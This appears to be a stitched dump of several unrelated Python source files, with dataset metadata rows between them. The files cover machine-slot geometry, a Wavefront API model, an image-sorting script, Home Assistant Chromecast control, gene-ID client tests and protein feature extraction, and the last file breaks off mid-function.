# Z3 = R1*exp(1i*theta)
# (R1*cos(theta)-x2)*R1*cos(theta)+(R1*sin(theta)-y2)*R1*sin(theta) = 0
R1 = self.R1
y2 = (Z2 - Zc1).imag
x2 = (Z2 - Zc1).real
theta = 2 * arctan((y2 - sqrt(-(R1 ** 2) + x2 ** 2 + y2 ** 2)) / (R1 + x2))
Z3 = R1 * exp(1j * theta) + Zc1
else:
raise S15InnerError("Slot Type 15 can't be used on inner lamination")
# symetry
Z8 = Z6.conjugate()
Z9 = Z5.conjugate()
Z10 = Z4.conjugate()
Z11 = Z3.conjugate()
Z12 = Z2.conjugate()
Z13 = Z1.conjugate()
return [Z13, Z12, Z11, Z10, Z9, Z8, Z7, Z6, Z5, Z4, Z3, Z2, Z1]
| 32.385714
| 83
| 0.505073
|
ac3366f96112505ab20c0d59d749c71f9b140848
| 4,993
|
py
|
Python
|
wavefront_api_client/models/response_container_paged_report_event_anomaly_dto.py
|
httpsgithu/python-client
|
f85a530367cdabe458a11919ad35609b9bc0606b
|
[
"Apache-2.0"
] | null | null | null |
wavefront_api_client/models/response_container_paged_report_event_anomaly_dto.py
|
httpsgithu/python-client
|
f85a530367cdabe458a11919ad35609b9bc0606b
|
[
"Apache-2.0"
] | null | null | null |
wavefront_api_client/models/response_container_paged_report_event_anomaly_dto.py
|
httpsgithu/python-client
|
f85a530367cdabe458a11919ad35609b9bc0606b
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Wavefront REST API Documentation
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: chitimba@wavefront.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from wavefront_api_client.configuration import Configuration
class ResponseContainerPagedReportEventAnomalyDTO(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'response': 'PagedReportEventAnomalyDTO',
'status': 'ResponseStatus'
}
attribute_map = {
'response': 'response',
'status': 'status'
}
def __init__(self, response=None, status=None, _configuration=None): # noqa: E501
"""ResponseContainerPagedReportEventAnomalyDTO - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._response = None
self._status = None
self.discriminator = None
if response is not None:
self.response = response
self.status = status
@property
def response(self):
"""Gets the response of this ResponseContainerPagedReportEventAnomalyDTO. # noqa: E501
:return: The response of this ResponseContainerPagedReportEventAnomalyDTO. # noqa: E501
:rtype: PagedReportEventAnomalyDTO
"""
return self._response
@response.setter
def response(self, response):
"""Sets the response of this ResponseContainerPagedReportEventAnomalyDTO.
:param response: The response of this ResponseContainerPagedReportEventAnomalyDTO. # noqa: E501
:type: PagedReportEventAnomalyDTO
"""
self._response = response
@property
def status(self):
"""Gets the status of this ResponseContainerPagedReportEventAnomalyDTO. # noqa: E501
:return: The status of this ResponseContainerPagedReportEventAnomalyDTO. # noqa: E501
:rtype: ResponseStatus
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this ResponseContainerPagedReportEventAnomalyDTO.
:param status: The status of this ResponseContainerPagedReportEventAnomalyDTO. # noqa: E501
:type: ResponseStatus
"""
if self._configuration.client_side_validation and status is None:
raise ValueError("Invalid value for `status`, must not be `None`") # noqa: E501
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ResponseContainerPagedReportEventAnomalyDTO, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ResponseContainerPagedReportEventAnomalyDTO):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ResponseContainerPagedReportEventAnomalyDTO):
return True
return self.to_dict() != other.to_dict()
| 33.066225
| 409
| 0.629281
|
018f7479f5a19b76fef4aa8529da886f2f2b94f0
| 806
|
py
|
Python
|
class_separation.py
|
UmarKhalidcs/ACL-for-Face-Recognition
|
e10f1f870dfc86382c8acfc9fcc23ab39bd14c92
|
[
"MIT"
] | null | null | null |
class_separation.py
|
UmarKhalidcs/ACL-for-Face-Recognition
|
e10f1f870dfc86382c8acfc9fcc23ab39bd14c92
|
[
"MIT"
] | null | null | null |
class_separation.py
|
UmarKhalidcs/ACL-for-Face-Recognition
|
e10f1f870dfc86382c8acfc9fcc23ab39bd14c92
|
[
"MIT"
] | null | null | null |
import os,shutil
identity_CelebA_text = open('D:\\Research_work\\project_3\\umar_version\\data\\celeba\\identity_CelebA.txt', 'r')
Lines = identity_CelebA_text.readlines()
img_align_celeb_path="D:\\Research_work\\project_3\\umar_version\\data\celeba\\img_align_celeba\\"
classified_path="D:\\Research_work\\project_3\\umar_version\\data\celeba\\data\\"
# Strips the newline character
for line in Lines:
b,a=line.strip().split()
class_path = os.path.join(classified_path, a)
orig_img_path = img_align_celeb_path + b
if os.path.isdir(class_path):
new_image_path=class_path+"\\"+b
shutil.copy(orig_img_path,new_image_path)
else:
os.mkdir(class_path)
new_image_path = class_path + "\\" + b
shutil.copy(orig_img_path, new_image_path)
| 44.777778
| 114
| 0.712159
|
ac988d542207d0026ff192cba4c6cb7bc5154993
| 515
|
py
|
Python
|
blog/conf/__init__.py
|
lingfromSh/blog
|
190e4c1162c7fb31f88b7e8f806ccdd9aace6e93
|
[
"Apache-2.0"
] | null | null | null |
blog/conf/__init__.py
|
lingfromSh/blog
|
190e4c1162c7fb31f88b7e8f806ccdd9aace6e93
|
[
"Apache-2.0"
] | 3
|
2020-09-11T14:52:00.000Z
|
2020-09-11T15:17:54.000Z
|
blog/conf/__init__.py
|
lingfromSh/blog
|
190e4c1162c7fb31f88b7e8f806ccdd9aace6e93
|
[
"Apache-2.0"
] | null | null | null |
import importlib
PythonPath = str
class LazyConfig:
def from_object(self, config: object):
def is_dunder_name(name: str):
return name.startswith("__") and name.endswith("__")
for attr_name in dir(config):
if not is_dunder_name(attr_name):
setattr(self, attr_name, getattr(config, attr_name))
def set_project_config(file: PythonPath):
global settings
obj = importlib.import_module(file)
settings.from_object(obj)
settings = LazyConfig()
| 23.409091
| 68
| 0.673786
|
9e2843d0e74a6190c921616e6bc81c27fa01da69
| 891
|
py
|
Python
|
World/Object/Unit/Player/Handlers/PlayerInit.py
|
sergio-ivanuzzo/idewave-core
|
31b2b2ec4ac222e02af57d8b2d7a3277e4a444ae
|
[
"Apache-2.0"
] | 10
|
2019-06-29T19:24:52.000Z
|
2021-02-21T22:45:57.000Z
|
World/Object/Unit/Player/Handlers/PlayerInit.py
|
sergio-ivanuzzo/wowcore
|
31b2b2ec4ac222e02af57d8b2d7a3277e4a444ae
|
[
"Apache-2.0"
] | 4
|
2019-08-15T07:03:36.000Z
|
2021-06-02T13:01:25.000Z
|
World/Object/Unit/Player/Handlers/PlayerInit.py
|
sergio-ivanuzzo/idewave-core
|
31b2b2ec4ac222e02af57d8b2d7a3277e4a444ae
|
[
"Apache-2.0"
] | 8
|
2019-06-30T22:47:48.000Z
|
2021-02-20T19:21:30.000Z
|
from World.Object.Unit.Player.PlayerManager import PlayerManager
from Server.Registry.QueuesRegistry import QueuesRegistry
from Server.Connection.Connection import Connection
class PlayerInit(object):
__slots__ = ('data', 'connection')
def __init__(self, **kwargs):
self.data: bytes = kwargs.pop('data', bytes())
self.connection: Connection = kwargs.pop('connection')
async def process(self) -> tuple:
self._load_player()
await QueuesRegistry.connections_queue.put(self.connection)
return None, None
def _load_player(self) -> None:
# size (first 2 bytes) - opcode (next 4 bytes) - guid (remaining bytes)
guid = int.from_bytes(self.data, 'little')
with PlayerManager() as player_mgr:
player_mgr.load(id=guid)
player = player_mgr.player
self.connection.player = player
| 31.821429
| 79
| 0.674523
|
66183d6364472c48a89f3e18e569aa4ded43aa2b
| 327
|
py
|
Python
|
addons/utils/checks.py
|
T3CHNOLOG1C/GLaDOS
|
723da47178c395e37828f067b3e0def9735609a5
|
[
"Apache-2.0"
] | 5
|
2018-07-19T19:57:59.000Z
|
2020-04-13T00:16:26.000Z
|
addons/utils/checks.py
|
T3CHNOLOG1C/GLaDOS
|
723da47178c395e37828f067b3e0def9735609a5
|
[
"Apache-2.0"
] | 11
|
2018-07-19T19:24:44.000Z
|
2020-04-29T00:28:38.000Z
|
addons/utils/checks.py
|
T3CHNOLOG1C/GLaDOS
|
723da47178c395e37828f067b3e0def9735609a5
|
[
"Apache-2.0"
] | 32
|
2018-03-20T00:08:54.000Z
|
2020-02-15T04:54:18.000Z
|
from discord.ext.commands import check
def _check_owner(ctx):
return ctx.bot.owner_role in ctx.message.author.roles
def _check_botdev(ctx):
return ctx.bot.botdev_role in ctx.message.author.roles or _check_owner(ctx)
def is_owner():
return check(_check_owner)
def is_botdev():
return check(_check_botdev)
| 19.235294
| 79
| 0.75841
|
9f6597edde5a6c28397edf1e98ad587909067b1a
| 2,441
|
py
|
Python
|
indra/tests/test_hgnc_client.py
|
qiuhaoling/indra
|
fa1fb31c4333ea63d023181eaf6f759e3dd3b400
|
[
"BSD-2-Clause"
] | null | null | null |
indra/tests/test_hgnc_client.py
|
qiuhaoling/indra
|
fa1fb31c4333ea63d023181eaf6f759e3dd3b400
|
[
"BSD-2-Clause"
] | null | null | null |
indra/tests/test_hgnc_client.py
|
qiuhaoling/indra
|
fa1fb31c4333ea63d023181eaf6f759e3dd3b400
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
from indra.databases import hgnc_client
from indra.util import unicode_strs
from nose.plugins.attrib import attr
def test_get_uniprot_id():
hgnc_id = '6840'
uniprot_id = hgnc_client.get_uniprot_id(hgnc_id)
assert uniprot_id == 'Q02750'
assert unicode_strs(uniprot_id)
def test_get_uniprot_id_none():
# This HGNC entry doesn't have a UniProt ID
hgnc_id = '12027'
uniprot_id = hgnc_client.get_uniprot_id(hgnc_id)
assert uniprot_id is None
def test_get_hgnc_name():
hgnc_id = '3236'
hgnc_name = hgnc_client.get_hgnc_name(hgnc_id)
assert hgnc_name == 'EGFR'
assert unicode_strs(hgnc_name)
@attr('webservice')
def test_get_hgnc_name_nonexistent():
hgnc_id = '123456'
hgnc_name = hgnc_client.get_hgnc_name(hgnc_id)
assert hgnc_name is None
assert unicode_strs(hgnc_name)
def test_entrez_hgnc():
entrez_id = '653509'
hgnc_id = hgnc_client.get_hgnc_from_entrez(entrez_id)
assert hgnc_id == '10798'
def test_entrez_hgnc_none():
entrez_id = 'xxx'
hgnc_id = hgnc_client.get_hgnc_from_entrez(entrez_id)
assert hgnc_id is None
def test_mouse_map():
hgnc_id1 = hgnc_client.get_hgnc_from_mouse('109599')
hgnc_id2 = hgnc_client.get_hgnc_from_mouse('MGI:109599')
assert hgnc_id1 == '4820'
assert hgnc_id2 == '4820'
hgnc_id = hgnc_client.get_hgnc_from_mouse('xxx')
assert hgnc_id is None
def test_rat_map():
hgnc_id1 = hgnc_client.get_hgnc_from_rat('6496784')
hgnc_id2 = hgnc_client.get_hgnc_from_rat('RGD:6496784')
assert hgnc_id1 == '44155'
assert hgnc_id2 == '44155'
hgnc_id = hgnc_client.get_hgnc_from_rat('xxx')
assert hgnc_id is None
def test_is_category():
assert hgnc_client.is_kinase('MAPK1')
assert not hgnc_client.is_kinase('EGF')
assert hgnc_client.is_phosphatase('PTEN')
assert not hgnc_client.is_phosphatase('KRAS')
assert hgnc_client.is_transcription_factor('FOXO3')
assert not hgnc_client.is_transcription_factor('AKT1')
def test_get_current_id():
# Current symbol
assert hgnc_client.get_current_hgnc_id('BRAF') == '1097'
# Outdated symbol, one ID
assert hgnc_client.get_current_hgnc_id('SEPT7') == '1717'
# Outdated symbol, multiple IDs
ids = hgnc_client.get_current_hgnc_id('HOX1')
assert len(ids) == 10
assert '5101' in ids
| 28.717647
| 72
| 0.736583
|
1604e72f9507574b4506dca839c84d0e96c6e95c
| 10,685
|
py
|
Python
|
homeassistant/components/chromecast.py
|
EnTeQuAk/home-assistant
|
f9fbb30fc0905a9d1858cb5829a6d9c16a9c50de
|
[
"MIT"
] | 1
|
2019-06-27T11:32:36.000Z
|
2019-06-27T11:32:36.000Z
|
homeassistant/components/chromecast.py
|
EnTeQuAk/home-assistant
|
f9fbb30fc0905a9d1858cb5829a6d9c16a9c50de
|
[
"MIT"
] | null | null | null |
homeassistant/components/chromecast.py
|
EnTeQuAk/home-assistant
|
f9fbb30fc0905a9d1858cb5829a6d9c16a9c50de
|
[
"MIT"
] | 1
|
2015-06-16T19:42:51.000Z
|
2015-06-16T19:42:51.000Z
|
"""
homeassistant.components.chromecast
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Provides functionality to interact with Chromecasts.
"""
import logging
import homeassistant.util as util
import homeassistant.components as components
DOMAIN = 'chromecast'
DEPENDENCIES = []
SERVICE_YOUTUBE_VIDEO = 'play_youtube_video'
ENTITY_ID_FORMAT = DOMAIN + '.{}'
STATE_NO_APP = 'idle'
ATTR_STATE = 'state'
ATTR_OPTIONS = 'options'
ATTR_MEDIA_STATE = 'media_state'
ATTR_MEDIA_CONTENT_ID = 'media_content_id'
ATTR_MEDIA_TITLE = 'media_title'
ATTR_MEDIA_ARTIST = 'media_artist'
ATTR_MEDIA_ALBUM = 'media_album'
ATTR_MEDIA_IMAGE_URL = 'media_image_url'
ATTR_MEDIA_VOLUME = 'media_volume'
ATTR_MEDIA_DURATION = 'media_duration'
MEDIA_STATE_UNKNOWN = 'unknown'
MEDIA_STATE_PLAYING = 'playing'
MEDIA_STATE_STOPPED = 'stopped'
def is_on(hass, entity_id=None):
""" Returns true if specified ChromeCast entity_id is on.
Will check all chromecasts if no entity_id specified. """
entity_ids = [entity_id] if entity_id else hass.get_entity_ids(DOMAIN)
return any(not hass.states.is_state(entity_id, STATE_NO_APP)
for entity_id in entity_ids)
def turn_off(hass, entity_id=None):
""" Will turn off specified Chromecast or all. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_TURN_OFF, data)
def volume_up(hass, entity_id=None):
""" Send the chromecast the command for volume up. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_VOLUME_UP, data)
def volume_down(hass, entity_id=None):
""" Send the chromecast the command for volume down. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_VOLUME_DOWN, data)
def media_play_pause(hass, entity_id=None):
""" Send the chromecast the command for play/pause. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_MEDIA_PLAY_PAUSE, data)
def media_play(hass, entity_id=None):
""" Send the chromecast the command for play/pause. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_MEDIA_PLAY, data)
def media_pause(hass, entity_id=None):
""" Send the chromecast the command for play/pause. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_MEDIA_PAUSE, data)
def media_next_track(hass, entity_id=None):
""" Send the chromecast the command for next track. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_MEDIA_NEXT_TRACK, data)
def media_prev_track(hass, entity_id=None):
""" Send the chromecast the command for prev track. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_MEDIA_PREV_TRACK, data)
# pylint: disable=too-many-locals, too-many-branches
def setup(hass, config):
""" Listen for chromecast events. """
logger = logging.getLogger(__name__)
try:
import pychromecast
except ImportError:
logger.exception(("Failed to import pychromecast. "
"Did you maybe not install the 'pychromecast' "
"dependency?"))
return False
if 'hosts' in config[DOMAIN]:
hosts = config[DOMAIN]['hosts'].split(",")
# If no hosts given, scan for chromecasts
else:
logger.info("Scanning for Chromecasts")
hosts = pychromecast.discover_chromecasts()
casts = {}
for host in hosts:
try:
cast = pychromecast.PyChromecast(host)
entity_id = util.ensure_unique_string(
ENTITY_ID_FORMAT.format(
util.slugify(cast.device.friendly_name)),
list(casts.keys()))
casts[entity_id] = cast
except pychromecast.ChromecastConnectionError:
pass
if not casts:
logger.error("Could not find Chromecasts")
return False
def update_chromecast_state(entity_id, chromecast):
""" Retrieve state of Chromecast and update statemachine. """
chromecast.refresh()
status = chromecast.app
state_attr = {components.ATTR_FRIENDLY_NAME:
chromecast.device.friendly_name}
if status and status.app_id != pychromecast.APP_ID['HOME']:
state = status.app_id
ramp = chromecast.get_protocol(pychromecast.PROTOCOL_RAMP)
if ramp and ramp.state != pychromecast.RAMP_STATE_UNKNOWN:
if ramp.state == pychromecast.RAMP_STATE_PLAYING:
state_attr[ATTR_MEDIA_STATE] = MEDIA_STATE_PLAYING
else:
state_attr[ATTR_MEDIA_STATE] = MEDIA_STATE_STOPPED
if ramp.content_id:
state_attr[ATTR_MEDIA_CONTENT_ID] = ramp.content_id
if ramp.title:
state_attr[ATTR_MEDIA_TITLE] = ramp.title
if ramp.artist:
state_attr[ATTR_MEDIA_ARTIST] = ramp.artist
if ramp.album:
state_attr[ATTR_MEDIA_ALBUM] = ramp.album
if ramp.image_url:
state_attr[ATTR_MEDIA_IMAGE_URL] = ramp.image_url
if ramp.duration:
state_attr[ATTR_MEDIA_DURATION] = ramp.duration
state_attr[ATTR_MEDIA_VOLUME] = ramp.volume
else:
state = STATE_NO_APP
hass.states.set(entity_id, state, state_attr)
def update_chromecast_states(time): # pylint: disable=unused-argument
""" Updates all chromecast states. """
logger.info("Updating Chromecast status")
for entity_id, cast in casts.items():
update_chromecast_state(entity_id, cast)
def _service_to_entities(service):
""" Helper method to get entities from service. """
entity_ids = components.extract_entity_ids(hass, service)
if entity_ids:
for entity_id in entity_ids:
cast = casts.get(entity_id)
if cast:
yield entity_id, cast
else:
yield from casts.items()
def turn_off_service(service):
""" Service to exit any running app on the specified ChromeCast and
shows idle screen. Will quit all ChromeCasts if nothing specified.
"""
for entity_id, cast in _service_to_entities(service):
cast.quit_app()
update_chromecast_state(entity_id, cast)
def volume_up_service(service):
""" Service to send the chromecast the command for volume up. """
for _, cast in _service_to_entities(service):
ramp = cast.get_protocol(pychromecast.PROTOCOL_RAMP)
if ramp:
ramp.volume_up()
def volume_down_service(service):
""" Service to send the chromecast the command for volume down. """
for _, cast in _service_to_entities(service):
ramp = cast.get_protocol(pychromecast.PROTOCOL_RAMP)
if ramp:
ramp.volume_down()
def media_play_pause_service(service):
""" Service to send the chromecast the command for play/pause. """
for _, cast in _service_to_entities(service):
ramp = cast.get_protocol(pychromecast.PROTOCOL_RAMP)
if ramp:
ramp.playpause()
def media_play_service(service):
""" Service to send the chromecast the command for play/pause. """
for _, cast in _service_to_entities(service):
ramp = cast.get_protocol(pychromecast.PROTOCOL_RAMP)
if ramp and ramp.state == pychromecast.RAMP_STATE_STOPPED:
ramp.playpause()
def media_pause_service(service):
""" Service to send the chromecast the command for play/pause. """
for _, cast in _service_to_entities(service):
ramp = cast.get_protocol(pychromecast.PROTOCOL_RAMP)
if ramp and ramp.state == pychromecast.RAMP_STATE_PLAYING:
ramp.playpause()
def media_next_track_service(service):
""" Service to send the chromecast the command for next track. """
for entity_id, cast in _service_to_entities(service):
ramp = cast.get_protocol(pychromecast.PROTOCOL_RAMP)
if ramp:
next(ramp)
update_chromecast_state(entity_id, cast)
def play_youtube_video_service(service, video_id):
""" Plays specified video_id on the Chromecast's YouTube channel. """
if video_id: # if service.data.get('video') returned None
for entity_id, cast in _service_to_entities(service):
pychromecast.play_youtube_video(video_id, cast.host)
update_chromecast_state(entity_id, cast)
hass.track_time_change(update_chromecast_states)
hass.services.register(DOMAIN, components.SERVICE_TURN_OFF,
turn_off_service)
hass.services.register(DOMAIN, components.SERVICE_VOLUME_UP,
volume_up_service)
hass.services.register(DOMAIN, components.SERVICE_VOLUME_DOWN,
volume_down_service)
hass.services.register(DOMAIN, components.SERVICE_MEDIA_PLAY_PAUSE,
media_play_pause_service)
hass.services.register(DOMAIN, components.SERVICE_MEDIA_PLAY,
media_play_service)
hass.services.register(DOMAIN, components.SERVICE_MEDIA_PAUSE,
media_pause_service)
hass.services.register(DOMAIN, components.SERVICE_MEDIA_NEXT_TRACK,
media_next_track_service)
hass.services.register(DOMAIN, "start_fireplace",
lambda service:
play_youtube_video_service(service, "eyU3bRy2x44"))
hass.services.register(DOMAIN, "start_epic_sax",
lambda service:
play_youtube_video_service(service, "kxopViU98Xo"))
hass.services.register(DOMAIN, SERVICE_YOUTUBE_VIDEO,
lambda service:
play_youtube_video_service(service,
service.data.get(
'video')))
update_chromecast_states(None)
return True
| 34.028662
| 78
| 0.644829
|
c72f016e7458965deca5b1633129b7537259ff63
| 263
|
py
|
Python
|
interface/caller.py
|
hhaensel/MolecularGraph.jl
|
c54ccdf09274e36ed3d866604f99b497a39bfaf5
|
[
"MIT"
] | 126
|
2019-01-28T06:54:27.000Z
|
2022-03-22T08:45:46.000Z
|
interface/caller.py
|
timholy/MolecularGraph.jl
|
90d6f6175f30023ffce92d9bbc386f8659866508
|
[
"MIT"
] | 64
|
2019-04-19T03:33:52.000Z
|
2022-03-22T23:34:44.000Z
|
interface/caller.py
|
timholy/MolecularGraph.jl
|
90d6f6175f30023ffce92d9bbc386f8659866508
|
[
"MIT"
] | 30
|
2019-02-07T04:08:52.000Z
|
2022-03-22T03:33:20.000Z
|
from ctypes import CDLL, c_char_p
JL = CDLL("invokejulia.so")
JL.smilestomol.argtypes = [c_char_p]
print(JL.smilestomol("CCC(=O)CCO".encode()))
"""
def mol_to_svg(mol):
JL.smilestomol.argtypes = None # Pointer to MolGraph
return JL.moltosvg(mol)
"""
| 18.785714
| 57
| 0.69962
|
bc7baf86b04992f12a4f38c4c8790ca7e44940ec
| 232
|
py
|
Python
|
mmp/cli/utils.py
|
alfonsocv12/mpip
|
972aca21916a6037a1656780e844a93070613d07
|
[
"MIT"
] | 3
|
2021-04-25T16:39:21.000Z
|
2021-04-28T22:17:44.000Z
|
mmp/cli/utils.py
|
alfonsocv12/mpip
|
972aca21916a6037a1656780e844a93070613d07
|
[
"MIT"
] | null | null | null |
mmp/cli/utils.py
|
alfonsocv12/mpip
|
972aca21916a6037a1656780e844a93070613d07
|
[
"MIT"
] | null | null | null |
import os
import mmp
def get_version_info(scope):
versioninfo = 'mmp version {}'.format(mmp.__version__)
if scope == 'mmp':
return versioninfo
raise ValueError("{} is not a valid version scope".format(scope))
| 21.090909
| 69
| 0.681034
|
ad43d6bdb56ff582e14ff9008aaaea727501ad6e
| 11,505
|
py
|
Python
|
MindSPONGE/mindsponge/fold/eval/data/feature/feature_extraction.py
|
mindspore-ai/mindscience
|
b5269245915695de2d99fb290fef662c241db189
|
[
"Apache-2.0"
] | 3
|
2021-11-10T06:17:50.000Z
|
2022-03-21T14:25:30.000Z
|
MindSPONGE/tests/fold_test/data/feature/feature_extraction.py
|
mindspore-ai/mindscience
|
b5269245915695de2d99fb290fef662c241db189
|
[
"Apache-2.0"
] | null | null | null |
MindSPONGE/tests/fold_test/data/feature/feature_extraction.py
|
mindspore-ai/mindscience
|
b5269245915695de2d99fb290fef662c241db189
|
[
"Apache-2.0"
] | 1
|
2021-12-05T11:41:29.000Z
|
2021-12-05T11:41:29.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""feature extraction"""
import copy
import numpy as np
from commons import residue_constants
from data.feature import data_transforms
NUM_RES = "num residues placeholder"
NUM_SEQ = "length msa placeholder"
NUM_TEMPLATES = "num templates placeholder"
FEATURES = {
"aatype": (np.float32, [NUM_RES, 21]),
"between_segment_residues": (np.int64, [NUM_RES, 1]),
"deletion_matrix": (np.float32, [NUM_SEQ, NUM_RES, 1]),
"msa": (np.int64, [NUM_SEQ, NUM_RES, 1]),
"num_alignments": (np.int64, [NUM_RES, 1]),
"residue_index": (np.int64, [NUM_RES, 1]),
"seq_length": (np.int64, [NUM_RES, 1]),
"all_atom_positions": (np.float32, [NUM_RES, residue_constants.atom_type_num, 3]),
"all_atom_mask": (np.int64, [NUM_RES, residue_constants.atom_type_num]),
"resolution": (np.float32, [1]),
"template_domain_names": (str, [NUM_TEMPLATES]),
"template_sum_probs": (np.float32, [NUM_TEMPLATES, 1]),
"template_aatype": (np.float32, [NUM_TEMPLATES, NUM_RES, 22]),
"template_all_atom_positions": (np.float32, [NUM_TEMPLATES, NUM_RES, residue_constants.atom_type_num, 3]),
"template_all_atom_masks": (np.float32, [NUM_TEMPLATES, NUM_RES, residue_constants.atom_type_num, 1]),
}
def nonensembled_map_fns(data_config):
"""Input pipeline functions which are not ensembled."""
common_cfg = data_config.common
map_fns = [
data_transforms.correct_msa_restypes,
data_transforms.add_distillation_flag(False),
data_transforms.cast_64bit_ints,
data_transforms.squeeze_features,
data_transforms.randomly_replace_msa_with_unknown(0.0),
data_transforms.make_seq_mask,
data_transforms.make_msa_mask,
data_transforms.make_hhblits_profile,
data_transforms.make_random_crop_to_size_seed,
]
if common_cfg.use_templates:
map_fns.extend([data_transforms.fix_templates_aatype, data_transforms.make_pseudo_beta('template_')])
map_fns.extend([data_transforms.make_atom14_masks,])
return map_fns
def ensembled_map_fns(data_config):
"""Input pipeline functions that can be ensembled and averaged."""
common_cfg = data_config.common
eval_cfg = data_config.eval
map_fns = []
if common_cfg.reduce_msa_clusters_by_max_templates:
pad_msa_clusters = eval_cfg.max_msa_clusters - eval_cfg.max_templates
else:
pad_msa_clusters = eval_cfg.max_msa_clusters
max_msa_clusters = pad_msa_clusters
max_extra_msa = common_cfg.max_extra_msa
map_fns.append(data_transforms.sample_msa(max_msa_clusters, keep_extra=True))
if 'masked_msa' in common_cfg:
map_fns.append(data_transforms.make_masked_msa(common_cfg.masked_msa, eval_cfg.masked_msa_replace_fraction))
if common_cfg.msa_cluster_features:
map_fns.append(data_transforms.nearest_neighbor_clusters())
map_fns.append(data_transforms.summarize_clusters())
if max_extra_msa:
map_fns.append(data_transforms.crop_extra_msa(max_extra_msa))
else:
map_fns.append(data_transforms.delete_extra_msa)
map_fns.append(data_transforms.make_msa_feat())
crop_feats = dict(eval_cfg.feat)
if eval_cfg.fixed_size:
map_fns.append(data_transforms.select_feat(list(crop_feats)))
map_fns.append(data_transforms.random_crop_to_size(
eval_cfg.crop_size,
eval_cfg.max_templates,
crop_feats,
eval_cfg.subsample_templates))
map_fns.append(data_transforms.make_fixed_size(
crop_feats,
pad_msa_clusters,
common_cfg.max_extra_msa,
eval_cfg.crop_size,
eval_cfg.max_templates))
else:
map_fns.append(data_transforms.crop_templates(eval_cfg.max_templates))
return map_fns
def process_arrays_from_config(arrays, data_config):
"""Apply filters and maps to an existing dataset, based on the config."""
def wrap_ensemble_fn(data, i):
"""Function to be mapped over the ensemble dimension."""
d = data.copy()
fns = ensembled_map_fns(data_config)
fn = data_transforms.compose(fns)
d['ensemble_index'] = i
return fn(d)
eval_cfg = data_config.eval
arrays = data_transforms.compose(nonensembled_map_fns(data_config))(arrays)
arrays_0 = wrap_ensemble_fn(arrays, np.array(0, np.int32))
num_ensemble = eval_cfg.num_ensemble
if data_config.common.resample_msa_in_recycling:
num_ensemble *= data_config.common.num_recycle + 1
result_array = {x: () for x in arrays_0.keys()}
if num_ensemble > 1:
for i in range(num_ensemble):
arrays_t = wrap_ensemble_fn(arrays, np.array(i, np.int32))
for key in arrays_0.keys():
result_array[key] += (arrays_t[key][None],)
for key in arrays_0.keys():
result_array[key] = np.concatenate(result_array[key], axis=0)
else:
result_array = {key: arrays_0[key][None] for key in arrays_0.keys()}
return result_array
def feature_shape(feature_name,
num_residues,
msa_length,
num_templates,
features=None):
"""Get the shape for the given feature name."""
features = features or FEATURES
if feature_name.endswith("_unnormalized"):
feature_name = feature_name[:-13]
unused_dtype, raw_sizes = features[feature_name]
replacements = {NUM_RES: num_residues,
NUM_SEQ: msa_length}
if num_templates is not None:
replacements[NUM_TEMPLATES] = num_templates
sizes = [replacements.get(dimension, dimension) for dimension in raw_sizes]
for dimension in sizes:
if isinstance(dimension, str):
raise ValueError("Could not parse %s (shape: %s) with values: %s" % (
feature_name, raw_sizes, replacements))
size_r = [int(x) for x in sizes]
return size_r
def parse_reshape_logic(parsed_features, features, num_template, key=None):
"""Transforms parsed serial features to the correct shape."""
num_residues = np.reshape(parsed_features['seq_length'].astype(np.int32), (-1,))[0]
if "num_alignments" in parsed_features:
